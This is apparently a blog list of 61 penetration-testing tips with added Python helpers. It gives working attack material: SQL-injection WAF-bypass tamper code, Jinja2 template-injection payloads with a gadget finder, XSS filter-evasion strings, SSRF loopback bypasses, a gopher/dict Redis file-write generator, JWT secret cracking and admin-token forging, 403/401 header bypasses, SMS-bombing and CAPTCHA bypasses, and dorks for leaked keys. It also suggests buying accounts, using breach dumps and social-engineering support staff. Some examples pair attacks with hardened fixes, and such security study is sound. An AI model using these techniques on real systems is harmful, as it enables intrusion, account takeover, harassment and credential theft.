61 small tips for common problems in penetration testing

1. If the response complains that parameters are missing, e.g. {msg: params error}, use dictionary fuzzing to guess the expected parameter names, then build on what is accepted.

2. To probe for integer overflow, feed numeric inputs the maximum 32-bit signed int, 2147483647, and the value just above it, and watch how the program behaves (negative totals, crashes, bypassed limits).

3. Don't be discouraged by 403 or 404 responses; brute-force directories with tools such as dirsearch.

4. Simple CAPTCHA bypasses: reuse a code that was already accepted, try universal codes (0000, 8888), send an empty code, or OCR the image (the PKAV HTTP Fuzzer tool can recognise simple CAPTCHAs).

5. SMS bombing bypass: prefixing the phone number with +86 may get past the per-number limit. Also try putting the phone number in the email field (and the email address in the phone field) to see which field the limit is keyed on.

6. If a verification code is still valid, try requesting the code again repeatedly within its lifetime. Because the old code is still live, the application may resend the same code and extend its validity period instead of issuing a new one.

7. In SQL injection against MySQL, && can replace and, e.g.: ' && '1'='1, which is sent URL-encoded as ' %26%26 '1'='1 so that the ampersands are not read as parameter separators.

8. In SQL injection against MySQL, if the WAF filters =, use like instead, e.g.: and 1 like 1

9. A JWT can be decoded at jwt.calebb.net/ (the header and payload are only base64url-encoded, not encrypted). Forging a valid token requires the secret key, so try submitting arbitrary or malformed tokens and check whether an error message leaks the key. Tokens can be generated with the Firebase PHP JWT library at github.com/firebase/php

JWT format header.payload.signature
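The three operations tip 9 touches on, as an added example that is not part of the original page: decode a token without any key (what jwt.calebb.net does), verify or forge an HS256 signature once the secret is known, and, going one step beyond the tip, recover a weak secret offline from a wordlist. Everything here is standard-library Python; the secret, wordlist and token are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Build header.payload.signature; the HMAC-SHA256 covers 'header.payload'."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signature = hmac.new(secret, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(signature)}"


def decode_unverified(token: str):
    """Header and claims are readable by anyone; no key is involved."""
    header, body, _ = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(body))


def verify_hs256(token: str, secret: bytes) -> bool:
    header, body, signature = token.split(".")
    expected = hmac.new(secret, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature))


def crack_secret(token: str, candidates):
    """Offline dictionary attack: the candidate for which the signature verifies is the secret."""
    for word in candidates:
        if verify_hs256(token, word.encode()):
            return word
    return None


def forge_admin(token: str, secret: bytes) -> str:
    """Re-sign the captured token's claims with the recovered secret after flipping a claim."""
    _, claims = decode_unverified(token)
    return sign_hs256(dict(claims, admin=True), secret)


# Constructed demo data: a weak server secret and a captured low-privilege token
WEAK_SECRET = b"secret"
WORDLIST = ["123456", "password", "jwt", "secret", "changeme"]
CAPTURED = sign_hs256({"sub": "alice", "admin": False}, WEAK_SECRET)
```

Tokens signed with RS256 cannot be recovered this way; there the things to test are whether the server accepts alg=none or an HS256 token signed with the public key.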

10. If a service on port 1234 exposes Spring Boot Actuator endpoints alongside Redis, try the /actuator/redis/info path to see whether it leaks sensitive information, e.g.: xxx.com:1234/actuator/r

11. GitLab arbitrary file read, CVE-2020-10977

12. On API endpoints, construct the parameters yourself: send them as a POST body, and try JSON as well (remember the Content-Type: application/json header). Parameter names worth trying: page, size, id.

13. If SMS sending is rate-limited per phone number, try adding special characters or spaces in front of the number.

The back-end logic is probably this: the user submits the phone number --> the back end checks whether this number has already requested a code within the last 30 or 60 seconds --> if not, it checks whether the submitted value is a clean 11-digit number

--> if not, it strips the non-numeric characters --> then compares the result with the phone numbers in the database; as long as the number exists there, a verification code is sent to it. The rate limit is keyed on the raw input, the lookup on the cleaned number, so every variant of the same number gets its own quota.

14. The image CAPTCHA can sometimes be left empty or set to a bogus value, e.g.: code=undefined

15. Where the site automatically fills in content that is sent to the user, check whether that content (the verification code, message text, or link) appears in a cookie or request parameter. If you can change it, you can craft a phishing link that the site delivers for you.

16. Template injection: expressions placed inside {{xxx}} are evaluated by the template engine, e.g.:

www.baidu.com/{{1+1}}

Taking Python (Jinja2-style templates) as an example, a payload that lists every file in the current directory:
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
The indices depend on the interpreter: on Python 3 the MRO of str is (str, object), so __mro__[2] raises IndexError and __mro__[1] (or [-1]) is needed, and the position of the useful class in __subclasses__() (71 here) changes with the Python version and the modules loaded.
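Added example (not code from the original page): instead of hard-coding the subclass index 71, walk object.__subclasses__() the same way the payload does and locate a class whose __init__ globals give access to the os module, then emit the payload with the index that is correct for this interpreter. It uses __mro__[-1] so that it works on Python 3; the "via sys.modules" route is a fallback assumed here for interpreters where no loaded module has os in its globals.

```python
import os  # used only to cross-check the result; the gadget chain itself never names it


def find_os_gadget():
    """Return (index, os_module, route) for the first usable class in object.__subclasses__().

    Mirrors the SSTI chain ''.__class__.__mro__[-1].__subclasses__()[i].__init__.__globals__:
    only classes with a Python-level __init__ expose __globals__, and only some of those
    globals contain 'os' (route "os") or 'sys' (route "sys", via sys.modules['os']).
    """
    base = "".__class__.__mro__[-1]  # object, on both Python 2 and 3
    for idx, cls in enumerate(base.__subclasses__()):
        try:
            init = cls.__dict__.get("__init__")
            g = getattr(init, "__globals__", None)
        except Exception:  # exotic metaclasses; skip rather than abort the walk
            continue
        if not g:
            continue
        osmod = g.get("os")
        if hasattr(osmod, "listdir"):
            return idx, osmod, "os"
        sysmod = g.get("sys")
        if hasattr(sysmod, "modules") and "os" in sysmod.modules:
            return idx, sysmod.modules["os"], "sys"
    return None


def build_payload(idx: int, route: str) -> str:
    """The {{ ... }} expression to send, with the index found for this interpreter."""
    chain = "''.__class__.__mro__[-1].__subclasses__()[%d].__init__.__globals__" % idx
    if route == "os":
        return "{{%s['os'].listdir('.')}}" % chain
    return "{{%s['sys'].modules['os'].listdir('.')}}" % chain


def listdir_via_gadget(path: str = "."):
    found = find_os_gadget()
    if found is None:
        raise RuntimeError("no usable gadget class in this interpreter")
    return sorted(found[1].listdir(path))


def gadget_matches_import(path: str = ".") -> bool:
    """True when the gadget chain reaches the same os module as a plain import."""
    return listdir_via_gadget(path) == sorted(os.listdir(path))


if __name__ == "__main__":
    idx, _, route = find_os_gadget()
    print(build_payload(idx, route))
```

Run it on an interpreter of the same version as the target to get a payload that is likely to work there; if the application sandboxes __subclasses__ or __globals__, the walk fails and you need a different gadget.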

17. For information gathering, select the WeChat tab in Sogou search to find the official-account assets of the target company and its affiliates.

18. Search JS files for keywords such as API and Swagger UI to find API endpoint addresses.

19. Common path of swagger interface:

/swagger/
/api/swagger/
/swagger/ui/
/api/swagger/ui/
/swagger-ui.html/
/api/swagger-ui.html/
/user/swagger-ui.html/
/libs/swaggerui/
/api/swaggerui/
/swagger-resources/configuration/ui/
/swagger-resources/configuration/security/

20. Swagger UI pages can be fingerprinted by their fixed page title: Swagger UI

21. When blindly testing whether a directory exists, request it without a trailing slash: if the directory exists, the server often redirects to the same URL with a / appended.

22. Characters MySQL accepts as whitespace between tokens (URL-encoded): %09, %0a, %0b, %0c, %0d, %20, %a0
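Tips 7, 8 and 22 combined into one added example (not from the original page): a constructed naive keyword WAF that blocks a bare "and", any "=", and "union select" written with a plain space, and a tamper function that rewrites a payload with &&, like and an alternative MySQL whitespace byte, then checks which variants the filter lets through. The WAF rules are an assumption about the class of filter these tricks defeat, not any particular product.

```python
import re
from urllib.parse import unquote

# Constructed stand-in for a naive keyword WAF
NAIVE_WAF_RULES = [re.compile(p, re.I) for p in (r"\band\b", r"=", r"union select")]

# Bytes MySQL treats as whitespace (tip 22)
MYSQL_WHITESPACE = ["%09", "%0a", "%0b", "%0c", "%0d", "%20", "%a0"]


def waf_blocks(decoded_input: str) -> bool:
    return any(rule.search(decoded_input) for rule in NAIVE_WAF_RULES)


def survives_waf(encoded_input: str) -> bool:
    # latin-1 keeps %a0 as the single byte MySQL would see instead of a UTF-8 decode error
    return not waf_blocks(unquote(encoded_input, encoding="latin-1"))


def tamper(payload: str, whitespace: str = "%0a") -> str:
    """Apply tips 7, 8 and 22 to a URL-encoded injection payload:
    and -> && (sent as %26%26 so the & is not read as a parameter separator),
    = -> like, and every space -> the chosen MySQL whitespace byte."""
    out = re.sub(r"\band\b", "%26%26", payload, flags=re.I)
    out = re.sub(r"\s*=\s*", " like ", out)
    return out.replace(" ", whitespace)


def bypass_candidates(payload: str):
    """One variant per whitespace byte."""
    return [tamper(payload, ws) for ws in MYSQL_WHITESPACE]


def working_bypasses(payload: str):
    """The variants this filter lets through; try them in this order against the target."""
    return [v for v in bypass_candidates(payload) if survives_waf(v)]
```

For the "union select" case only the non-space whitespace bytes get through, which is the point of tip 22: the filter matched the literal space, MySQL accepts any of the seven.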

23. Ways to obtain a test account: breach dumps (社工库), QQ groups, credentials leaked on GitHub, or borrowing, renting or buying an account.

24. If an Alibaba Cloud AK/SK (AccessKey ID and secret) has leaked, the AKSKtools tool can be used to exploit it further:

xz.aliyun.com/t/8429

25. If a back-end page flashes up and then bounces you to the login page, the authorization check is usually done by a redirect or front-end code only. The following methods can bypass it; they are also worth trying whenever you get a 401, 403 or 302:

1) GET /xxx HTTP/1.1 → 403
Host: test.com
Bypass:
GET /xxx HTTP/1.1 → 200
Host: test.com
X-Original-URL: /xxx
2) GET /xxx HTTP/1.1 → 403
Host: test.com
Bypass:
GET /xxx HTTP/1.1 → 200
Host: test.com
Referer: http://test.com/xxx
3) 302 redirect: intercept and drop the redirect response so the browser stays on the current page.
4) Front-end checks: simply delete the overlay element or the front-end validation code.
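Why bypasses 1 and 2 of tip 25 work, as an added example (not from the original page): a constructed dispatcher whose access check looks at the request-line path and trusts a same-site Referer, while routing honours X-Original-URL; beside it the hardened form, which authorizes the path that will actually be served and ignores client-supplied headers. The routes, the ACL and the "session=valid" cookie are assumptions for the demo. The page shows the same path in both requests; the model below sends a harmless path and moves the protected one into the header, which is the usual shape of this bypass.

```python
# Constructed routing table and ACL
ROUTES = {"/": "public page", "/xxx": "protected report", "/admin": "admin panel"}
PROTECTED = ("/xxx", "/admin")


def has_session(headers: dict) -> bool:
    return headers.get("Cookie") == "session=valid"  # stand-in for a real session lookup


def vulnerable_handle(path: str, headers: dict):
    """Both flaws from tip 25 in one dispatcher; returns (status, body)."""
    # Flaw 1: a Referer pointing into the site is accepted as proof the user is already inside it
    referer_ok = headers.get("Referer", "").startswith("http://test.com/")
    if path.startswith(PROTECTED) and not (has_session(headers) or referer_ok):
        return 403, ""
    # Flaw 2: the ACL above looked at the request-line path, but routing honours X-Original-URL
    target = headers.get("X-Original-URL", path)
    return (200, ROUTES[target]) if target in ROUTES else (404, "")


def hardened_handle(path: str, headers: dict):
    """Authorize the path that will actually be served, and trust nothing the client sent."""
    target = path  # override headers are dropped; a trusted reverse proxy would strip them too
    if target.startswith(PROTECTED) and not has_session(headers):
        return 403, ""
    return (200, ROUTES[target]) if target in ROUTES else (404, "")
```

The same mistake, trusting a header the client controls, is what makes X-Forwarded-For and similar IP headers bypass IP allowlists.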

26. A tool for generating gopher protocol payload:

https://github.com/firebroo/sec_tools

27. Writing a file to Redis through the dict protocol:

1. Write the content:
dict://127.0.0.1:6379/set:x:test
2. Set the save directory:
dict://127.0.0.1:6379/config:set:dir:/tmp/
3. Set the file name:
dict://127.0.0.1:6379/config:set:dbfilename:1.png
4. Save:
dict://127.0.0.1:6379/save
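What a gopher payload generator like the one in tip 26 produces, and the dict form from tip 27, as an added example (not the sec_tools code and not from the page): the Redis commands are encoded in RESP (*argc, then $len and value per argument), percent-encoded, and placed after the gopher item-type character so that the SSRF client writes the raw bytes to the socket. The command list reproduces tip 27's four steps.

```python
from urllib.parse import quote


def resp_encode(args) -> bytes:
    """Encode one Redis command in RESP: *<argc>\\r\\n then $<len>\\r\\n<value>\\r\\n per argument."""
    out = b"*%d\r\n" % len(args)
    for arg in args:
        data = arg.encode() if isinstance(arg, str) else arg
        out += b"$%d\r\n%s\r\n" % (len(data), data)
    return out


def redis_gopher_url(host: str, port: int, commands) -> str:
    """gopher:// URL that makes the SSRF client connect and send the raw RESP bytes.
    The '_' after the slash is the gopher item-type character; it is not sent, everything after it is."""
    payload = b"".join(resp_encode(cmd) for cmd in commands)
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def redis_dict_urls(host: str, port: int, commands):
    """dict:// form from tip 27, one URL per command. curl's dict handler sends the path with every ':'
    replaced by a space, which is why set:x:test reaches Redis as 'set x test'."""
    return ["dict://%s:%d/%s" % (host, port, ":".join(cmd)) for cmd in commands]


# Constructed example: the four steps of tip 27 (write a key, point the RDB dump at /tmp/1.png, save)
WRITE_FILE = [
    ["set", "x", "test"],
    ["config", "set", "dir", "/tmp/"],
    ["config", "set", "dbfilename", "1.png"],
    ["save"],
]

if __name__ == "__main__":
    print(redis_gopher_url("127.0.0.1", 6379, WRITE_FILE))
    print("\n".join(redis_dict_urls("127.0.0.1", 6379, WRITE_FILE)))
```

The dumped RDB file contains the value wrapped in binary framing, so for a web shell or cron job the value needs surrounding newlines; the gopher form can carry all four commands in one request, the dict form needs one request per command.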

28. Privilege escalation to a root shell through SUID binaries on CentOS 7:

https://www.freebuf.com/articles/system/244627.html

29. A tag-based XSS payload that needs no event handler:

<a href=javascript:alert(1)>xx</a>

30. When the XSS filter strips single quotes and the equals sign, you can:

1) Use String.fromCharCode(97,108,101,114,116,40,49,41), which evaluates to the string alert(1); since the result is a string, run it with eval() to pop the dialog:
eval(String.fromCharCode(97,108,101,114,116,40,49,41));
2) Use atob with a tagged template, which needs neither quotes nor parentheses around the argument:
eval(atob`YWxlcnQoMSk=`) is equivalent to eval("alert(1)"), since YWxlcnQoMSk= is base64 for alert(1) (` is a backtick)

31. When the XSS filter strips single quotes, the equals sign, parentheses and eval:

1) If eval is filtered, other routes to code execution still work, e.g. Function or a constructor chain, again invoked through tagged templates so that no parentheses are needed:
Function`a${atob`YWxlcnQoMSk=`}```
``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```

32. The following command shows whether you are inside a Docker container (look for docker or kubepods in the paths; on cgroup v2 hosts the file only shows 0::/, so also check for /.dockerenv):

cat /proc/1/cgroup

33. Try the universal password '=0# (in MySQL, password=''=0 is parsed as (password='')=0, which is true whenever the password does not match).

34. CORS vulnerability verification with curl:

curl https://www.xxxx.com -H "Origin: https://test.com" -I
Check whether the Access-Control-Allow-Origin header in the response is https://test.com; the finding is exploitable when Access-Control-Allow-Credentials: true is returned alongside it.
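Added example (not from the original page) for classifying the response from tip 34's curl command: it parses the header block as `curl -I` prints it, distinguishes a reflected origin with credentials (exploitable) from a fixed allowlist or a bare wildcard, and lists the origins worth sending, including the null origin and two that defeat unanchored regex allowlists. The responses are constructed.

```python
def parse_headers(raw: str) -> dict:
    """Parse the header block printed by `curl -I` into a dict keyed by lower-cased names."""
    headers = {}
    for line in raw.splitlines():
        if ":" in line and not line.startswith("HTTP/"):
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_cors(origin_sent: str, headers: dict) -> str:
    acao = headers.get("access-control-allow-origin")
    creds = headers.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "none"                 # no CORS headers at all
    if acao == "*":
        return "wildcard"             # browsers refuse '*' with credentials, so only public data leaks
    if acao == origin_sent:
        return "reflected+credentials" if creds else "reflected"  # the first is the exploitable case
    return "allowlisted"              # a fixed value that is not our origin


def probe_origins(target_host: str):
    """Origins to try, in order: arbitrary, null (sandboxed iframes and data: URLs),
    then two that beat allowlists matching the target host as an unanchored substring."""
    return [
        "https://test.com",
        "null",
        "https://%s.test.com" % target_host,
        "https://test%s" % target_host,
    ]


def curl_command(url: str, origin: str) -> str:
    return 'curl -s -I -H "Origin: %s" %s' % (origin, url)


# Constructed responses as `curl -I` would print them
REFLECTING = (
    "HTTP/1.1 200 OK\r\n"
    "Access-Control-Allow-Origin: https://test.com\r\n"
    "Access-Control-Allow-Credentials: true\r\n"
    "Vary: Origin\r\n"
)
FIXED = "HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: https://www.xxxx.com\r\n"
```

A GET with -I only covers simple requests; for endpoints that need a preflight, repeat the check with -X OPTIONS and an Access-Control-Request-Method header.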

35. To test blindly whether the target runs Apache Shiro, send a cookie rememberMe=xxx by hand.

If the response carries rememberMe=deleteMe in Set-Cookie, the application uses Shiro and can be attacked further (e.g. the rememberMe deserialization issue).

36. Extract the other URLs a file or page contains with a regular expression (the original command had a stray * after the closing quote, which the shell treats as a glob):

cat file | grep -Eo "https?://[a-zA-Z0-9./?=_&%:#-]*"
curl -s http://host.xx/file.js | grep -Eo "https?://[a-zA-Z0-9./?=_&%:#-]*"

37. For common remote command execution (RCE) parameter names, see the RCE-extentions.txt file in the dicts directory.

38. A few small ways to bypass SSRF protections:

A. Use another address in the loopback range (the whole of 127.0.0.0/8 is loopback), e.g.:
http://127.127.127.127
http://127.0.0.0
B. Abbreviated addresses, e.g.:
http://127.1
http://0
C. Join several addresses with special characters so that different parsers pick different hosts, e.g.:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib: 3.3.3.3
D. Confuse the URL parser, e.g.:
http://127.1.1.1:80\@127.2.2.2:80/
E. Reach localhost through IPv6 [::] instead of 127.0.0.1, e.g.:
http://[::]:80/
http://0000::1:80/
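Added example (not from the original page) showing why the bypasses in tip 38 work and what a filter has to do instead: a naive blocklist that compares strings against 127.0.0.1 and localhost, beside a hardened check that parses the URL, converts whatever the parser calls the host into an address (inet_aton accepts 127.1, 0 and decimal forms; mapped IPv6 is unwrapped) and rejects loopback, private, link-local, unspecified and reserved ranges. DNS is replaced by a constructed lookup table so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed offline stand-in for DNS
RESOLVER = {"example.com": "93.184.216.34", "intranet.test": "10.0.0.5"}

NAIVE_BLOCKLIST = ("127.0.0.1", "localhost", "0.0.0.0")


def naive_is_blocked(url: str) -> bool:
    """String matching: defeated by every item in tip 38."""
    return any(bad in url for bad in NAIVE_BLOCKLIST)


def resolve_host(host: str):
    """Turn whatever the URL parser called a host into an ip_address, or None."""
    try:
        ip = ipaddress.ip_address(host)              # canonical IPv4 / IPv6 literal
    except ValueError:
        try:
            # inet_aton accepts the short forms: 127.1, 0, 2130706433, 0x7f000001
            ip = ipaddress.ip_address(socket.inet_aton(host))
        except OSError:
            if host not in RESOLVER:
                return None
            ip = ipaddress.ip_address(RESOLVER[host])
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                          # ::ffff:127.0.0.1 is loopback too
    return ip


def hardened_is_blocked(url: str) -> bool:
    """Parse, resolve, then decide on the address; anything unparsable is refused."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return True
    if parts.scheme not in ("http", "https") or not host:
        return True
    ip = resolve_host(host)
    if ip is None:
        return True
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)
```

Even the hardened check is only half of it: the fetch must connect to the address that was checked (or the resolver must be pinned), otherwise a DNS name that changes its answer between the check and the request (rebinding) still reaches the internal host, and redirects must be re-checked hop by hop.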

39. Some commonly used Google dorks:

inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

40. Find websites that belong together by comparing the hash of their favicon:

Script: https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
Command: python3 favihash.py -f https://target/favicon.ico -t targets.txt -s

41. For common local file inclusion parameter names, see the LFI-extentions.txt file in the dicts directory.

42. You can find hidden GET parameters in JavaScript files, e.g.:

First, find variables in the JS file, such as: var test="xss"
Then try each of them as a GET parameter, e.g.:
https://example.com/?test="xsstest
This method may turn up some XSS.
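One script for tips 18, 36 and 42, added here as an example (not from the original page): it pulls absolute URLs, quoted API-looking paths and variable names out of a JS file, flags anything that looks like a Swagger or OpenAPI document, and turns the variable names into GET probes carrying a reflection marker. The sample JS is constructed, and the path prefixes it looks for (api, v1, swagger, actuator, graphql) are an assumption about what is worth reporting.

```python
import re
from urllib.parse import quote

URL_RE = re.compile(r"https?://[A-Za-z0-9./?=_&%:#-]+")
# quoted relative paths that look like API or documentation endpoints
PATH_RE = re.compile(r"""["'](/(?:api|v\d+|swagger|actuator|graphql)[A-Za-z0-9_./-]*)["']""")
# variables assigned a string literal: candidate hidden GET parameter names (tip 42)
VAR_RE = re.compile(r"\b(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*[\"']")
SWAGGER_HINTS = ("swagger", "api-docs", "openapi")


def extract(js: str) -> dict:
    urls = sorted(set(URL_RE.findall(js)))
    paths = sorted(set(PATH_RE.findall(js)))
    params = sorted(set(VAR_RE.findall(js)))
    swagger = sorted(u for u in urls + paths if any(h in u.lower() for h in SWAGGER_HINTS))
    return {"urls": urls, "paths": paths, "params": params, "swagger": swagger}


def param_probe_urls(base: str, params, marker: str = '"xsstest'):
    """Tip 42: one request per variable name, carrying a marker that is easy to spot in the response."""
    return ["%s?%s=%s" % (base, p, quote(marker, safe="")) for p in params]


# Constructed sample input
SAMPLE_JS = """
var test = "xss";
const apiBase = "https://api.example.com/v1/users?page=1&size=20";
let docs = '/swagger-ui.html';
fetch("/api/orders/" + id);
// legacy: http://cdn.example.com/lib.js
"""

if __name__ == "__main__":
    import sys
    found = extract(open(sys.argv[1], encoding="utf-8", errors="replace").read())
    for key, values in found.items():
        print(key, *values, sep="\n  ")
```

Minified bundles put thousands of variables on one line, so feed the params list through a wordlist of known parameter names before probing, or the request count becomes unmanageable.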

43. Use github dorks to help us find some sensitive information, such as:

extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic "support.avast.com"
extension:js jsforce conn.login
extension:json googleusercontent client_secret
"target.com" send_keys
"target.com" password
"target.com" api_key
"target.com" apikey
"target.com" jira_password
"target.com" root_password
"target.com" access_token
"target.com" config
"target.com" client_secret
"target.com" user auth
With these queries you can find private keys, SSH login keys, MySQL database passwords, API keys and so on.
Also recommended, a script that automates them: https://github.com/techgaun/github-dorks

44. For common parameters of SSRF, please refer to the SSRF-extensions.txt file in the dicts directory for details.

45. Appending a .json suffix can leak sensitive information, e.g.:

A normal request:
GET /ResetPassword HTTP/1.1
{"email":"[email protected]"}
Response:
HTTP/1.1 200 OK
The same request with a .json suffix:
GET /ResetPassword.json HTTP/1.1
{"email":"[email protected]"}
Response:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
Original source: https://twitter.com/SalahHasoneh1/status/1293918353971531776

46. If the response is 401, try adding the request header X-Custom-IP-Authorization: 127.0.0.1

47. For a back-end login page whose password reset function exists but is disabled, find the company's technical support QQ group, pose as a user who has forgotten the password and ask for a reset; once the function is switched on, test it for password reset flaws.

48. If a back-end page flashes up and then bounces you to the login page, the authorization check is usually done client-side or by a redirect, so the bypasses from tip 25 apply.

49. 302 redirect: intercept and drop the redirect response so the browser stays on the current page.

This does not work every time; alternatively, change the returned 302 to 200 and delete the Location header.

50. Arbitrary file download: useful targets are /proc/self/cmdline (the command line of the current process) and /var/lib/mlocate/mlocate.db (full file paths on the system).

51. Business scenarios prone to SMS bombing, and the usual bypasses:

1) Login
2) Registration
3) Password recovery
4) Binding a phone number
5) Promotion or reward claiming
6) Site-specific features
7) Feedback forms
Common ways to bypass the limit:
Add spaces, 86, 086, 0086, +86, 0, 00, \r, \n or other special characters before or after the phone number
Modify the cookie, a variable, or the response
138888888889: a 12-digit number of which the SMS gateway keeps the first 11 digits, so every extra digit is a fresh quota
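A constructed model of the logic tip 13 describes and the bypasses tip 51 lists, added as an example (not from the original page): with strict=False the service rate-limits on the raw string and only then strips non-digits and keeps the first 11, so every variant of the same number is delivered; with strict=True it canonicalizes first and rate-limits on the canonical number. The accepted canonical form (optional China country code, then 1 and ten digits) and the in-memory stores are assumptions for the demo.

```python
import re
from collections import defaultdict

# Assumed canonical form: optional China country code, then an 11-digit mobile number starting with 1
CANONICAL = re.compile(r"(?:\+86|0086|86)?(1\d{10})")


class SmsService:
    """strict=False mirrors the vulnerable flow of tip 13; strict=True is the fix."""

    def __init__(self, strict: bool, users, window: int = 60):
        self.strict, self.users, self.window = strict, set(users), window
        self.last_sent = defaultdict(lambda: float("-inf"))
        self.delivered = []  # numbers actually handed to the SMS gateway

    @staticmethod
    def lax_normalize(raw: str):
        digits = re.sub(r"\D", "", raw)               # drop spaces, '+', ',', \r\n, ...
        digits = re.sub(r"^(?:0086|86)", "", digits)  # tolerate a country code
        return digits[:11] if len(digits) >= 11 else None  # gateway keeps the first 11 digits

    @staticmethod
    def strict_normalize(raw: str):
        m = CANONICAL.fullmatch(raw)
        return m.group(1) if m else None

    def send(self, raw: str, now: float) -> str:
        if self.strict:
            number = self.strict_normalize(raw)  # canonicalize first ...
            if number is None:
                return "invalid"
            key = number                         # ... and rate-limit on the canonical number
        else:
            key = raw                            # rate-limit keyed on the string as typed
            number = self.lax_normalize(raw)
            if number is None:
                return "invalid"
        if now - self.last_sent[key] < self.window:
            return "rate-limited"
        if number not in self.users:
            return "unknown"
        self.last_sent[key] = now
        self.delivered.append(number)
        return "sent"


# Constructed inputs: prefixes and suffixes from tip 51, the 12-digit trick, and a comma-joined pair (tip 56)
VARIANTS = [
    "13888888888",
    " 13888888888",
    "+8613888888888",
    "13888888888\r\n",
    "138888888889",
    "13888888888,13800000000",
]


def demo():
    """Returns (messages delivered by the lax service, messages delivered by the strict one)."""
    counts = []
    for strict in (False, True):
        svc = SmsService(strict=strict, users=["13888888888"])
        for variant in VARIANTS:
            svc.send(variant, now=0)
        counts.append(len(svc.delivered))
    return tuple(counts)
```

A per-number limit alone is still not enough in practice: the same attacker can cycle through many numbers, so a second limit per client IP or session is needed as well.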

52. When injecting, try --%0a union --%0a select: in MySQL the -- opens a comment that the newline (%0a) immediately closes, so the statement still reads as union select while filters looking for the keywords with ordinary spaces miss it.

53. When looking for injection points, pay extra attention to ORDER BY and GROUP BY clauses and to PHP {$var} string interpolation, which often go unparameterized.

54. Adding one or more + signs before the phone number can enable SMS bombing, because each variant gets its own quota.

55. If the SMS verification code shows up in the response on a neighbouring site (旁站) of the same host, check whether the main site or other sites share the same code.

56. When requesting an SMS verification code, submit two phone numbers separated by a comma; both numbers may receive the same code.

57. A quick boolean injection test: ord(0x1) evaluates to true and ord(0x0) to false, so compare the responses to and ord(0x1) and and ord(0x0).

58. With a file read vulnerability, besides configuration files, also read the website's own source files and audit them; careless development often leaves further vulnerabilities in the code.

59. Quickly start an HTTP server with Python:

Python 2.x:
python -m SimpleHTTPServer 8000
# serves the current directory on port 8000
Python 3.x:
python -m http.server 8000

60. Try not to expose your own IP address during a penetration test; put a proxy in front.

To check whether your terminal is going through the proxy on Linux, run curl ifconfig.me and check the returned IP address.

On Windows, simply visit ifconfig.me/ in the browser.

61. When organizing dictionaries, use the Linux tools to merge and deduplicate quickly (sort -u does the sort and uniq in one step):

cat file1.txt file2.txt fileN.txt > out.txt
sort out.txt | uniq > out2.txt


Source: blog.csdn.net/weixin_52501704/article/details/128656627